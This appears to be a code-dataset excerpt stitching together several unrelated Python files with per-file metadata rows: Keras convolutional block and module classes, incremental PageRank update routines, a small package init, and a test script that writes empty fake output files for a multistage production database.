    then Module2 (conv path) is gated by Module3 (global pooling path)
    through Module4's multiply."""

    def __init__(self, conf, rate, nc):
        """
        Parameters
        ----------
        conf: Dictionary
            Configuration dictionary.
        rate: tuple
            Base dilation rate for the convolution modules.
        nc: int
            Channel count entering the block; sub-modules use int(nc * 2).
        """
        # Keras Model subclasses must call super().__init__() BEFORE any
        # attribute assignment; assigning first raises RuntimeError in TF2.
        super(Block1, self).__init__()

        # Initialize.
        self.conf = conf
        self.raw_data_path = self.conf['raw_data_path']
        self.hps = self.conf['hps']
        self.nn_arch = self.conf['nn_arch']

        # Design layers.
        self.module1 = Module1(conf, rate, nc)
        self.module2 = Module2(conf, rate, int(nc * 2))
        self.module3 = Module3(conf, int(nc * 2))
        self.module4 = Module4(conf, rate, int(nc * 2))

    def call(self, input_tensor):
        """Forward: reduce, then fuse the conv branch with the pooled gate."""
        x2 = self.module1(input_tensor)
        x3 = self.module2(x2)
        x4 = self.module3(x2)
        x5 = self.module4([x3, x4])
        return x5
class Block2(Model):
    """Resolution-preserving block with a residual-style combine:
    Module2 conv path, Module3 pooled gate, Module4 multiply-fuse, and
    Module7 adds the block input back in."""

    def __init__(self, conf, rate, nc):
        """
        Parameters
        ----------
        conf: Dictionary
            Configuration dictionary.
        rate: tuple
            Base dilation rate for the convolution modules.
        nc: int
            Channel count of the block.
        """
        # Keras Model subclasses must call super().__init__() BEFORE any
        # attribute assignment; assigning first raises RuntimeError in TF2.
        super(Block2, self).__init__()

        # Initialize.
        self.conf = conf
        self.raw_data_path = self.conf['raw_data_path']
        self.hps = self.conf['hps']
        self.nn_arch = self.conf['nn_arch']

        # Design layers.
        self.module2 = Module2(conf, rate, nc)
        self.module3 = Module3(conf, nc)
        self.module4 = Module4(conf, rate, nc)
        self.module7 = Module7(conf, rate, nc)

    def call(self, input_tensor):
        """Forward: conv path gated by its pooled statistics, then an
        additive skip from the block input."""
        x2 = self.module2(input_tensor)
        x3 = self.module3(x2)
        x4 = self.module4([x2, x3])
        x5 = self.module7([input_tensor, x4])
        return x5
class Block3(Model):
    """Up-sampling block: Module6 doubles the spatial resolution, then a
    Module2/Module3/Module4 gated conv path, and Module7 adds the block
    input back in. NOTE(review): not referenced by the visible network;
    presumably a decoder building block — confirm before removing."""

    def __init__(self, conf, rate, nc):
        """
        Parameters
        ----------
        conf: Dictionary
            Configuration dictionary.
        rate: tuple
            Base dilation rate for the convolution modules.
        nc: int
            Channel count of the block.
        """
        # Keras Model subclasses must call super().__init__() BEFORE any
        # attribute assignment; assigning first raises RuntimeError in TF2.
        super(Block3, self).__init__()

        # Initialize.
        self.conf = conf
        self.raw_data_path = self.conf['raw_data_path']
        self.hps = self.conf['hps']
        self.nn_arch = self.conf['nn_arch']

        # Design layers.
        self.module6 = Module6(conf, nc)
        self.module2 = Module2(conf, rate, nc)
        self.module3 = Module3(conf, nc)
        self.module4 = Module4(conf, rate, nc)
        self.module7 = Module7(conf, rate, nc)

    def call(self, input_tensor):
        """Forward: upsample, gated conv path, additive skip from input."""
        x2 = self.module6(input_tensor)
        x3 = self.module2(x2)
        x4 = self.module3(x2)
        x5 = self.module4([x3, x4])
        x6 = self.module7([input_tensor, x5])
        return x6
class Module1(Model):
    """Reduction module: separable conv (nc channels) followed by a
    strided conv that halves resolution and doubles channels."""

    def __init__(self, conf, rate, nc):
        """
        Parameters
        ----------
        conf: Dictionary
            Configuration dictionary.
        rate: tuple
            Base dilation rate; scaled by nn_arch['conv_rate_multiplier'].
        nc: int
            Output channels of the separable conv; the strided conv
            emits int(nc * 2).
        """
        # Keras Model subclasses must call super().__init__() BEFORE any
        # attribute assignment; assigning first raises RuntimeError in TF2.
        super(Module1, self).__init__()

        # Initialize.
        self.conf = conf
        self.raw_data_path = self.conf['raw_data_path']
        self.hps = self.conf['hps']
        self.nn_arch = self.conf['nn_arch']

        # Design layers.
        self.sep_conv2d_1 = SeparableConv2D(
            nc,
            kernel_size=3,
            depth_multiplier=1,
            dilation_rate=(rate[0] * self.nn_arch['conv_rate_multiplier'],
                           rate[1] * self.nn_arch['conv_rate_multiplier']),
            padding='same',
            use_bias=False,
            kernel_initializer=initializers.TruncatedNormal())
        self.bn_1 = BatchNormalization(momentum=self.hps['bn_momentum'],
                                       scale=self.hps['bn_scale'])
        self.act_1 = Activation('relu')
        self.conv2d_2 = Conv2D(
            int(nc * 2),
            kernel_size=3,
            strides=2,
            padding='same',
            use_bias=False,
            kernel_initializer=initializers.TruncatedNormal(),
            kernel_regularizer=regularizers.l2(self.hps['weight_decay']))
        self.bn_2 = BatchNormalization(momentum=self.hps['bn_momentum'],
                                       scale=self.hps['bn_scale'])
        self.act_2 = Activation('relu')

    def call(self, input_tensor):
        """Forward: sep-conv -> BN -> ReLU -> strided conv -> BN -> ReLU."""
        x = self.sep_conv2d_1(input_tensor)
        x = self.bn_1(x)
        x = self.act_1(x)
        x = self.conv2d_2(x)
        x = self.bn_2(x)
        x = self.act_2(x)
        return x
class Module2(Model):
    """Conv path module: dilated expansion conv (2*nc), pointwise-style
    reduction conv back to ~nc, then a dilated depthwise conv. Each conv
    is followed by BN + ReLU."""

    def __init__(self, conf, rate, nc):
        """
        Parameters
        ----------
        conf: Dictionary
            Configuration dictionary.
        rate: tuple
            Base dilation rate; scaled by nn_arch['conv_rate_multiplier'].
        nc: int
            Nominal channel count of the module.
        """
        # Keras Model subclasses must call super().__init__() BEFORE any
        # attribute assignment; assigning first raises RuntimeError in TF2.
        super(Module2, self).__init__()

        # Initialize.
        self.conf = conf
        self.raw_data_path = self.conf['raw_data_path']
        self.hps = self.conf['hps']
        self.nn_arch = self.conf['nn_arch']

        # Design layers.
        self.conv2d_1 = Conv2D(
            int(nc * 2),
            kernel_size=3,
            dilation_rate=(rate[0] * self.nn_arch['conv_rate_multiplier'],
                           rate[1] * self.nn_arch['conv_rate_multiplier']),
            padding='same',
            use_bias=False,
            kernel_initializer=initializers.TruncatedNormal())
        self.bn_1 = BatchNormalization(momentum=self.hps['bn_momentum'],
                                       scale=self.hps['bn_scale'])
        self.act_1 = Activation('relu')
        # int(nc / 2 * 2) == nc for even nc; the max(1, ...) guards tiny nc.
        self.conv2d_2 = Conv2D(
            np.maximum(1, int(nc / 2 * 2)),
            kernel_size=3,
            strides=1,
            padding='same',
            use_bias=False,
            kernel_initializer=initializers.TruncatedNormal(),
            kernel_regularizer=regularizers.l2(self.hps['weight_decay']))
        self.bn_2 = BatchNormalization(momentum=self.hps['bn_momentum'],
                                       scale=self.hps['bn_scale'])
        self.act_2 = Activation('relu')
        self.depthwise_conv2d_3 = DepthwiseConv2D(
            kernel_size=3,
            depth_multiplier=1,
            dilation_rate=(rate[0] * self.nn_arch['conv_rate_multiplier'],
                           rate[1] * self.nn_arch['conv_rate_multiplier']),
            padding='same',
            use_bias=False,
            kernel_initializer=initializers.TruncatedNormal())
        self.bn_3 = BatchNormalization(momentum=self.hps['bn_momentum'],
                                       scale=self.hps['bn_scale'])
        self.act_3 = Activation('relu')

    def call(self, input_tensor):
        """Forward: expand -> reduce -> depthwise, each with BN + ReLU."""
        x = self.conv2d_1(input_tensor)
        x = self.bn_1(x)
        x = self.act_1(x)
        x = self.conv2d_2(x)
        x = self.bn_2(x)
        x = self.act_2(x)
        x = self.depthwise_conv2d_3(x)
        x = self.bn_3(x)
        x = self.act_3(x)
        return x
class Module3(Model):
    """Global-context module: global average pooling squeezed to 1x1,
    bottleneck 1x1 conv (nc/4), then 1x1 conv back to nc channels.
    NOTE(review): resembles squeeze-and-excitation but has no
    non-linearity/sigmoid between the convs — confirm intended."""

    def __init__(self, conf, nc):
        """
        Parameters
        ----------
        conf: Dictionary
            Configuration dictionary.
        nc: int
            Channel count of the input and of the output gate.
        """
        # Keras Model subclasses must call super().__init__() BEFORE any
        # attribute assignment; assigning first raises RuntimeError in TF2.
        super(Module3, self).__init__()

        # Initialize.
        self.conf = conf
        self.raw_data_path = self.conf['raw_data_path']
        self.hps = self.conf['hps']
        self.nn_arch = self.conf['nn_arch']

        # Design layers.
        self.global_avg_pool2d_1 = GlobalAveragePooling2D()  # data_format?
        self.reshape_1 = Reshape((1, 1, nc))
        self.conv2d_1 = Conv2D(
            np.maximum(1, int(nc / 4)),
            kernel_size=1,
            strides=1,
            padding='same',
            use_bias=False,
            kernel_initializer=initializers.TruncatedNormal(),
            kernel_regularizer=regularizers.l2(self.hps['weight_decay']))
        self.conv2d_2 = Conv2D(
            nc,
            kernel_size=1,
            strides=1,
            padding='same',
            use_bias=False,
            kernel_initializer=initializers.TruncatedNormal(),
            kernel_regularizer=regularizers.l2(self.hps['weight_decay']))

    def call(self, input_tensor):
        """Forward: pool to a 1x1xnc descriptor, bottleneck, re-expand."""
        x = self.global_avg_pool2d_1(input_tensor)
        x = self.reshape_1(x)
        x = self.conv2d_1(x)
        x = self.conv2d_2(x)
        return x
class Module4(Model):
    """Fusion module: element-wise multiply of two tensors followed by a
    dilated conv + BN + ReLU."""

    def __init__(self, conf, rate, nc):
        """
        Parameters
        ----------
        conf: Dictionary
            Configuration dictionary.
        rate: tuple
            Base dilation rate; scaled by nn_arch['conv_rate_multiplier'].
        nc: int
            Output channel count.
        """
        # Keras Model subclasses must call super().__init__() BEFORE any
        # attribute assignment; assigning first raises RuntimeError in TF2.
        super(Module4, self).__init__()

        # Initialize.
        self.conf = conf
        self.raw_data_path = self.conf['raw_data_path']
        self.hps = self.conf['hps']
        self.nn_arch = self.conf['nn_arch']

        # Design layers.
        self.multiply_1 = Multiply()
        self.conv2d_1 = Conv2D(
            np.maximum(1, int(nc)),
            kernel_size=3,
            dilation_rate=(rate[0] * self.nn_arch['conv_rate_multiplier'],
                           rate[1] * self.nn_arch['conv_rate_multiplier']),
            padding='same',
            use_bias=False,
            kernel_initializer=initializers.TruncatedNormal())
        self.bn_1 = BatchNormalization(momentum=self.hps['bn_momentum'],
                                       scale=self.hps['bn_scale'])
        self.act_1 = Activation('relu')

    def call(self, inputs):
        """Forward over a two-tensor list: multiply -> conv -> BN -> ReLU.

        Raises
        ------
        ValueError
            If `inputs` is not a list of exactly two tensors.
        """
        x = inputs
        if not isinstance(x, list) or len(x) != 2:
            raise ValueError('Input must be a list of two tensors.')
        x = self.multiply_1([x[0], x[1]])
        x = self.conv2d_1(x)
        x = self.bn_1(x)
        x = self.act_1(x)
        return x
class Module5(Model):
    """Output head: a single 3x3 conv projecting to nc channels (no BN or
    activation — the raw conv output is the model's final feature map)."""

    def __init__(self, conf, nc):
        """
        Parameters
        ----------
        conf: Dictionary
            Configuration dictionary.
        nc: int
            Number of output channels.
        """
        # Keras Model subclasses must call super().__init__() BEFORE any
        # attribute assignment; assigning first raises RuntimeError in TF2.
        super(Module5, self).__init__()

        # Initialize.
        self.conf = conf
        self.raw_data_path = self.conf['raw_data_path']
        self.hps = self.conf['hps']
        self.nn_arch = self.conf['nn_arch']

        # Design layers.
        self.conv2d_1 = Conv2D(
            nc,
            kernel_size=3,
            strides=1,
            padding='same',
            use_bias=False,
            kernel_initializer=initializers.TruncatedNormal(),
            kernel_regularizer=regularizers.l2(self.hps['weight_decay']))

    def call(self, input_tensor):
        """Forward: single 3x3 projection conv."""
        x = self.conv2d_1(input_tensor)
        return x
class Module6(Model):
    """Up-sampling module: 2x nearest-neighbour upsample followed by a
    3x3 conv + BN + ReLU."""

    def __init__(self, conf, nc):
        """
        Parameters
        ----------
        conf: Dictionary
            Configuration dictionary.
        nc: int
            Output channel count of the conv.
        """
        # Keras Model subclasses must call super().__init__() BEFORE any
        # attribute assignment; assigning first raises RuntimeError in TF2.
        super(Module6, self).__init__()

        # Initialize.
        self.conf = conf
        self.raw_data_path = self.conf['raw_data_path']
        self.hps = self.conf['hps']
        self.nn_arch = self.conf['nn_arch']

        # Design layers.
        self.upsampling2d_1 = UpSampling2D()
        self.conv2d_1 = Conv2D(
            nc,
            kernel_size=3,
            strides=1,
            padding='same',
            use_bias=False,
            kernel_initializer=initializers.TruncatedNormal(),
            kernel_regularizer=regularizers.l2(self.hps['weight_decay']))
        self.bn_1 = BatchNormalization(momentum=self.hps['bn_momentum'],
                                       scale=self.hps['bn_scale'])
        self.act_1 = Activation('relu')

    def call(self, input_tensor):
        """Forward: upsample -> conv -> BN -> ReLU."""
        x = self.upsampling2d_1(input_tensor)
        x = self.conv2d_1(x)
        x = self.bn_1(x)
        x = self.act_1(x)
        return x
class Module7(Model):
    """Residual-merge module: element-wise add of two tensors followed by
    a dilated conv + BN + ReLU."""

    def __init__(self, conf, rate, nc):
        """
        Parameters
        ----------
        conf: Dictionary
            Configuration dictionary.
        rate: tuple
            Base dilation rate; scaled by nn_arch['conv_rate_multiplier'].
        nc: int
            Output channel count.
        """
        # Keras Model subclasses must call super().__init__() BEFORE any
        # attribute assignment; assigning first raises RuntimeError in TF2.
        super(Module7, self).__init__()

        # Initialize.
        self.conf = conf
        self.raw_data_path = self.conf['raw_data_path']
        self.hps = self.conf['hps']
        self.nn_arch = self.conf['nn_arch']

        # Design layers.
        self.add_1 = Add()
        self.conv2d_1 = Conv2D(
            nc,
            kernel_size=3,
            dilation_rate=(rate[0] * self.nn_arch['conv_rate_multiplier'],
                           rate[1] * self.nn_arch['conv_rate_multiplier']),
            padding='same',
            use_bias=False,
            kernel_initializer=initializers.TruncatedNormal())
        self.bn_1 = BatchNormalization(momentum=self.hps['bn_momentum'],
                                       scale=self.hps['bn_scale'])
        self.act_1 = Activation('relu')

    def call(self, inputs):
        """Forward over a two-tensor list: add -> conv -> BN -> ReLU.

        Raises
        ------
        ValueError
            If `inputs` is not a list of exactly two tensors.
        """
        x = inputs
        if not isinstance(x, list) or len(x) != 2:
            raise ValueError('Input must be a list of two tensors.')
        x = self.add_1([x[0], x[1]])
        x = self.conv2d_1(x)
        x = self.bn_1(x)
        x = self.act_1(x)
        return x
| 31.424632
| 117
| 0.520796
| 1,897
| 17,095
| 4.474433
| 0.084344
| 0.05278
| 0.02262
| 0.038878
| 0.823516
| 0.753652
| 0.732446
| 0.723374
| 0.711828
| 0.692389
| 0
| 0.03447
| 0.360222
| 17,095
| 544
| 118
| 31.424632
| 0.741611
| 0.085581
| 0
| 0.724138
| 0
| 0
| 0.06545
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.021944
| 0
| 0.159875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
20b36eac06c9f8734a53dbcfa544f8d4f758c008
| 6,029
|
py
|
Python
|
updateAlgos.py
|
estbautista/SSL_tracking_analytic
|
8fe631c40596264a69a4d2c584e4444d9ea1e0c8
|
[
"MIT"
] | null | null | null |
updateAlgos.py
|
estbautista/SSL_tracking_analytic
|
8fe631c40596264a69a4d2c584e4444d9ea1e0c8
|
[
"MIT"
] | null | null | null |
updateAlgos.py
|
estbautista/SSL_tracking_analytic
|
8fe631c40596264a69a4d2c584e4444d9ea1e0c8
|
[
"MIT"
] | null | null | null |
import numpy as np
from numpy import inf
import random
def GS_update(graph_init, graph_evol, eps, alpha, method, opt, mode) :
# initial distribution
N = graph_init.A.shape[0]
flops = 0
# extract operator and coefficients
if method == 'PageRank':
mu = (1-alpha)/alpha
psi = -2/(2*mu + 2)
rho = (2*mu)/(2*mu + 2)
OP_dif = np.array(-graph_evol.P.T + graph_init.P.T)
OP_evol = np.array(-graph_evol.P.T)
OP_init = np.array(-graph_init.P.T)
gt_init = np.array(graph_init.pr.T)
gt_evol = np.array(graph_evol.pr.T)
deg = np.count_nonzero(graph_init.P.T, axis=1)
elif method == 'GammaPageRank':
mu = (1-alpha)/alpha
psi = -10/(2*mu + 10)
rho = (2*mu)/(2*mu + 10)
OP_dif = np.array(graph_evol.Op_shift - graph_init.Op_shift)
OP_evol = np.array(graph_evol.Op_shift)
OP_init = np.array(graph_init.Op_shift)
gt_init = np.array(graph_init.gpr)
gt_evol = np.array(graph_evol.gpr)
deg = np.count_nonzero(graph_evol.Op_shift, axis=1)
print('---- Edges changed ----')
print('Edges init : ', np.count_nonzero(OP_dif - OP_evol) )
print('Edges Changed : ', np.count_nonzero(OP_dif) )
print('Edges evol : ', np.count_nonzero(OP_evol) )
# compute initial distribution (assuming p(0) = 0)
if opt == 'track' :
p = np.array(graph_init.p_gs)
r = np.array(graph_init.r_gs + psi*(OP_dif.dot(p)))
nnz = np.where(p != 0)[0]
flops = flops + np.count_nonzero(p) + np.count_nonzero(OP_dif[:,nnz]) + np.count_nonzero(OP_dif.dot(p))
elif opt == 'exact' :
p = np.array(gt_init)
r = np.array(psi*OP_dif.dot(p))
nnz = np.where(p != 0)[0]
flops = flops + np.count_nonzero(p) + np.count_nonzero(OP_dif[:,nnz]) + np.count_nonzero(OP_dif.dot(p))
it = 0
activeNodes = np.where(graph_evol.clust_memb > 0)[0]
if mode == 'FixedError' :
while (np.linalg.norm(p[activeNodes] - gt_evol[activeNodes] ,ord=2)/np.linalg.norm(gt_evol[activeNodes],ord=2)) > eps :
if np.count_nonzero(OP_dif) == 0:
break
it += 1
ix_u = np.argmax(abs(r))
r_u = float(r[ix_u])
p[ix_u] += r_u
r[ix_u] = 0;
r = r + np.expand_dims(psi*r_u*OP_evol[:,ix_u],1)
flops = flops + 2*np.count_nonzero(OP_evol[:,ix_u]) + np.int(deg[ix_u])
elif mode == 'FixedFlops':
while flops < eps :
if np.count_nonzero(OP_dif) == 0:
break
it += 1
ix_u = np.argmax(abs(r))
r_u = float(r[ix_u])
p[ix_u] += r_u
r[ix_u] = 0;
r = r + np.expand_dims(psi*r_u*OP_evol[:,ix_u],1)
flops = flops + 2*np.count_nonzero(OP_evol[:,ix_u]) + np.int(deg[ix_u])
if it == 0:
flops = 1
change = np.count_nonzero(OP_dif)/np.count_nonzero(OP_init)
err = np.linalg.norm(p[activeNodes] - gt_evol[activeNodes], ord=2)/np.linalg.norm(gt_evol[activeNodes])
print('---- Gauss Soutwell Update ----')
print('iter =', it)
print('flops =', flops)
print('err =', err)
return p, r, it, flops, change, err
def PI_update(graph_init, graph_evol, eps, alpha, method, opt, mode):
    """Incrementally update a (Gamma-)PageRank solution after a graph
    evolution using a power-iteration correction, while tracking an
    estimated flop count.

    The correction p_tmp is iterated as p_tmp <- rho*r + psi*OP_evol.dot(p_tmp)
    and folded into the solution as p + p_tmp/rho at the end.

    Parameters
    ----------
    graph_init, graph_evol :
        Graph snapshots before/after the change; must expose A, P (or
        Op_shift), pr (or gpr) and clust_memb; graph_init additionally
        p_pi when opt == 'track'.
    eps : target relative error ('FixedError') or flop budget ('FixedFlops').
    alpha : teleportation parameter; mu = (1 - alpha) / alpha.
    method : 'PageRank' or 'GammaPageRank' (any other value leaves the
        operators undefined and fails later with UnboundLocalError).
    opt : 'track' (warm-start from stored PI state) or 'exact'.
    mode : 'FixedError' or 'FixedFlops'; any other value skips the loop.

    Returns
    -------
    (p, it, flops, change, err) — note: unlike GS_update, the residual r
    is not returned.
    """
    # initial distribution
    N = graph_init.A.shape[0]
    flops = 0
    # extract operator and coefficients
    if method == 'PageRank':
        mu = (1-alpha)/alpha
        psi = -2/(2*mu + 2)
        rho = (2*mu)/(2*mu + 2)
        OP_dif = np.array( -graph_evol.P.T + graph_init.P.T )
        OP_evol = np.array( -graph_evol.P.T )
        OP_init = np.array( -graph_init.P.T )
        gt_init = np.array( graph_init.pr.T )
        gt_evol = np.array( graph_evol.pr.T )
    elif method == 'GammaPageRank':
        mu = (1-alpha)/alpha
        psi = -10/(2*mu + 10)
        rho = (2*mu)/(2*mu + 10)
        OP_dif = np.array( graph_evol.Op_shift - graph_init.Op_shift )
        OP_evol = np.array( graph_evol.Op_shift )
        OP_init = np.array( graph_init.Op_shift )
        gt_init = np.array( graph_init.gpr )
        gt_evol = np.array( graph_evol.gpr )
    print('---- Edges changed ----')
    print('Edges init : ', np.count_nonzero(OP_dif - OP_evol) )
    print('Edges Changed : ', np.count_nonzero(OP_dif) )
    print('Edges evol : ', np.count_nonzero(OP_evol) )
    activeNodes = np.where(graph_evol.clust_memb > 0)[0]
    # compute initial distribution (assuming p(0) = 0)
    if opt == 'track' :
        p = np.array( graph_init.p_pi )
        r = np.array( psi*(OP_dif.dot(p)) )
        # NOTE(review): nnz is taken over p[activeNodes] here, but the
        # indices are then used as columns of the full OP_dif; GS_update
        # uses np.where(p != 0) instead — confirm which is intended.
        nnz = np.where(p[activeNodes] != 0)[0]
        flops = flops + np.count_nonzero(OP_dif.dot(p)) + np.count_nonzero(OP_dif[:,nnz])
    elif opt == 'exact' :
        p = np.array( gt_init )
        r = np.array( psi*(OP_dif.dot(p)) )
        nnz = np.where(p[activeNodes] != 0)[0]
        flops = flops + np.count_nonzero(OP_dif.dot(p)) + np.count_nonzero(OP_dif[:,nnz])
    it = 0
    p_tmp = np.zeros([N,1])
    if mode == 'FixedError':
        # Iterate until the relative error of p + p_tmp/rho on the active
        # nodes drops below eps (or the graph did not actually change).
        while (np.linalg.norm(p[activeNodes] + (p_tmp[activeNodes]/rho) - gt_evol[activeNodes],ord=2)/np.linalg.norm(gt_evol[activeNodes],ord=2)) > eps :
            if np.count_nonzero(OP_dif) == 0:
                break
            it += 1
            # Safety valve: bail out (flops = NaN) if the target error is
            # unreachable within 10^4 iterations.
            if it > 1e4:
                flops = float('NaN')
                p_tmp = np.zeros([N,1])
                break
            # count the flops
            nnz = np.where(p_tmp != 0)[0]
            flops_dotprod = np.count_nonzero(OP_evol[:,nnz])
            flops_scaling = np.count_nonzero(p_tmp) + np.count_nonzero(r)
            flops_addition = np.count_nonzero(OP_evol.dot(p)) + np.count_nonzero(r)
            flops = flops + flops_dotprod + flops_scaling + flops_addition
            # next iteration
            p_tmp = rho*r + psi*OP_evol.dot(p_tmp)
    elif mode == 'FixedFlops':
        # Same iteration, but stop once the flop budget eps is exhausted.
        while flops < eps :
            if np.count_nonzero(OP_dif) == 0:
                break
            it += 1
            # count the flops
            nnz = np.where(p_tmp != 0)[0]
            flops_dotprod = np.count_nonzero(OP_evol[:,nnz])
            flops_scaling = np.count_nonzero(p_tmp) + np.count_nonzero(r)
            flops_addition = np.count_nonzero(OP_evol.dot(p)) + np.count_nonzero(r)
            flops = flops + flops_dotprod + flops_scaling + flops_addition
            # next iteration
            p_tmp = rho*r + psi*OP_evol.dot(p_tmp)
    # Fold the accumulated correction into the solution.
    p = p + (p_tmp/rho)
    flops = flops + np.count_nonzero(p_tmp)
    if it == 0:
        flops = 1
    change = np.count_nonzero(OP_dif)/np.count_nonzero(OP_init)
    err = np.linalg.norm(p[activeNodes] - gt_evol[activeNodes],ord=2)/np.linalg.norm(gt_evol[activeNodes],ord=2)
    print('---- Power Iteration Update ----')
    print('iter =', it)
    print('flops =', flops)
    print('err =', err)
    return p, it, flops, change, err
| 31.565445
| 147
| 0.650688
| 1,048
| 6,029
| 3.545802
| 0.09542
| 0.073466
| 0.146932
| 0.12056
| 0.937029
| 0.924381
| 0.910657
| 0.910657
| 0.910657
| 0.872443
| 0
| 0.018339
| 0.176978
| 6,029
| 190
| 148
| 31.731579
| 0.730552
| 0.044618
| 0
| 0.844595
| 0
| 0
| 0.058445
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013514
| false
| 0
| 0.02027
| 0
| 0.047297
| 0.108108
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
454a1f5c59325f786ffa898b612c692d2abc5ac9
| 142
|
py
|
Python
|
joeutils/state_management/__init__.py
|
joeflack4/joefuncs
|
937107bb8b47d6ba4c1fb4ec598bda1211deb5c4
|
[
"MIT"
] | null | null | null |
joeutils/state_management/__init__.py
|
joeflack4/joefuncs
|
937107bb8b47d6ba4c1fb4ec598bda1211deb5c4
|
[
"MIT"
] | 1
|
2021-06-01T22:45:31.000Z
|
2021-06-01T22:45:31.000Z
|
joeutils/state_management/__init__.py
|
joeflack4/joefuncs
|
937107bb8b47d6ba4c1fb4ec598bda1211deb5c4
|
[
"MIT"
] | 1
|
2022-01-04T14:37:29.000Z
|
2022-01-04T14:37:29.000Z
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""State Management"""
from joeutils.state_management import the, assign, print_state_history
| 28.4
| 70
| 0.732394
| 19
| 142
| 5.315789
| 0.842105
| 0.29703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 0.105634
| 142
| 4
| 71
| 35.5
| 0.787402
| 0.429577
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
4571bf1a257a3ae7cfc207d1cb9944549df70ac1
| 3,846
|
py
|
Python
|
test/multistage-test.py
|
coreyjadams/harvard_production
|
233f20ef62ca34375f09417f4a507aa977c53a2a
|
[
"MIT"
] | null | null | null |
test/multistage-test.py
|
coreyjadams/harvard_production
|
233f20ef62ca34375f09417f4a507aa977c53a2a
|
[
"MIT"
] | null | null | null |
test/multistage-test.py
|
coreyjadams/harvard_production
|
233f20ef62ca34375f09417f4a507aa977c53a2a
|
[
"MIT"
] | 1
|
2018-10-15T16:44:55.000Z
|
2018-10-15T16:44:55.000Z
|
import os
import yaml
from config import ProjectConfig
from utils import ProjectHandler
from database import DBUtil
# This script tests the multistage input/output flow.
# It generates fake data (empty files) based on the configuration
def part1():
    """Fake the first pass of the multistage flow.

    For every stage in the config: build/verify the stage directories,
    consume input from the previous stage (if any), write an empty fake
    output file per job/fcl, and declare it to the project database.
    """
    # parse the configuration file:
    config_file = '/home/cadams/Harvard-Production/yml-configs/bnb_plus_cosmics-multistage-test.yml'
    config = ProjectConfig(config_file)

    # Print out the stages to run over:
    # (.items() instead of the Python-2-only .iteritems())
    for name, stage in config.stages.items():
        # Create a handler to check files and such
        handler = ProjectHandler(config_file, action='status', stage=name)
        handler.build_directory()
        handler.first_stage_check()
        db = handler.project_db

        print('Faking stage {0}'.format(stage.name))
        print(' Input specified? {0}'.format(stage.has_input()))

        # Make sure output directory exists:
        out_dir = stage.output_directory()
        handler.make_directory(out_dir)

        # Generate fake output for this stage:
        for i in range(stage.n_jobs()):
            for fcl in stage.fcl():
                fcl = os.path.basename(fcl)
                _f = '/{0}_fake_{1}.root'.format(fcl, i)

                # Input
                if stage.has_input():
                    input_files, locations = stage.get_next_files(1, db)
                    print('Input files are: \n {0}'.format(input_files))

                # Processing: nothing actually happens.

                # Output: touch an empty fake file. (Renamed the context
                # variable from `file`, which shadowed the builtin.)
                with open(out_dir + _f, 'w') as fake_out:
                    pass

                # Declare the file to the database:
                db.declare_file(filename=_f,
                                dataset=stage.output_dataset(),
                                location=out_dir,
                                stage=name,
                                status=0,
                                nevents=10,
                                ftype=0)

                # Mark the input files as consumed:
                if stage.has_input():
                    stage.finalize(input_files, db)
def part2():
    """Fake the second pass of the multistage flow (part2 config).

    Same procedure as part1, driven by the *_part2.yml configuration and
    without echoing the consumed input file names.
    """
    # parse the configuration file:
    config_file = '/home/cadams/Harvard-Production/yml-configs/bnb_plus_cosmics-multistage-test_part2.yml'
    config = ProjectConfig(config_file)

    # Print out the stages to run over:
    # (.items() instead of the Python-2-only .iteritems())
    for name, stage in config.stages.items():
        handler = ProjectHandler(config_file, action='status', stage=name)
        handler.build_directory()
        handler.first_stage_check()
        db = handler.project_db

        print('Faking stage {0}'.format(stage.name))
        print(' Input specified? {0}'.format(stage.has_input()))

        # Make sure output directory exists:
        out_dir = stage.output_directory()
        handler.make_directory(out_dir)

        # Generate fake output for this stage:
        for i in range(stage.n_jobs()):
            for fcl in stage.fcl():
                fcl = os.path.basename(fcl)
                _f = '/{0}_fake_{1}.root'.format(fcl, i)

                # Input
                if stage.has_input():
                    input_files, locations = stage.get_next_files(1, db)

                # Processing: nothing actually happens.

                # Output: touch an empty fake file. (Renamed the context
                # variable from `file`, which shadowed the builtin.)
                with open(out_dir + _f, 'w') as fake_out:
                    pass

                # Declare the file to the database:
                db.declare_file(filename=_f,
                                dataset=stage.output_dataset(),
                                location=out_dir,
                                stage=name,
                                status=0,
                                nevents=10,
                                ftype=0)

                # Mark the input files as consumed:
                if stage.has_input():
                    stage.finalize(input_files, db)
def main():
    """Run both halves of the multistage flow test, in order."""
    for step in (part1, part2):
        step()


if __name__ == '__main__':
    main()
| 30.52381
| 106
| 0.555382
| 434
| 3,846
| 4.760369
| 0.25576
| 0.023233
| 0.037754
| 0.029042
| 0.849952
| 0.849952
| 0.849952
| 0.849952
| 0.849952
| 0.849952
| 0
| 0.009646
| 0.353094
| 3,846
| 126
| 107
| 30.52381
| 0.82074
| 0.171607
| 0
| 0.782609
| 1
| 0
| 0.102434
| 0.052482
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0.028986
| 0.072464
| 0
| 0.115942
| 0.072464
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
